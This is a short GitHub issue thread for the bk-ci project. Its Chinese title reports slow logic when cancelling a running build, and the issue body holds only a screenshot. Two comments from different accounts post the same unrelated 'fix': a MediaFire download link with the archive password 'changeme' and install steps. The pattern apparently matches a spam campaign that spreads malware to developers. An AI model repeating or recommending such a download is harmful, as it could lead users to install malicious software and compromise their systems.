### ISSUE TITLE
bug: 修正取消正在运行中构建可能产生的慢逻辑

### ISSUE THREAD

**Issue by irwinsun** [TencentBlueKing/bk-ci#10874]
<img width="642" alt="image" src="https://github.com/user-attachments/assets/94b33212-5b4d-4341-b3c8-65ee21e737eb">

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
